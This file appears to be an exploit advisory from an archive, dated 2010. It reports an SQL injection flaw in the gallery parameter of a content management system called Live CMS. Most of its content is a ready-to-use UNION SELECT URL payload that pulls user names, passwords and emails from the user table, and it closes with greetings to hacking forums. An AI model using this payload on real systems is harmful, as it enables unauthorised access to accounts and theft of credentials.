23 lines
No EOL
590 B
Text
Executable file
23 lines
No EOL
590 B
Text
Executable file
/*
|
|
[-] Live CMS SQL Injection Vulnerability [-]
|
|
---Date : 2010-06-17
|
|
---Author : ahwak2000
|
|
---Email : z.u5[at]hotmail.com
|
|
[-] Script Info [-]
|
|
---Home : http://live-space.ru
|
|
---Demo : http://demo.live-space.ru/index.php
|
|
|
|
[-] Vulnerability [-]
|
|
|
|
http://site.com/path//index.php?area=1&p=gallery&action=showimages&galid=[SQL INj]
|
|
|
|
[-] eXploit [-]
|
|
|
|
http://server/path/index.php?area=1&p=gallery&action=showimages&galid=1 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),uname,pass,email) from live_user--
|
|
|
|
|
|
[-] Greetz to [-]
|
|
|
|
To All Friends in V4-team Forums And pc.pirate
|
|
|
|
*/ |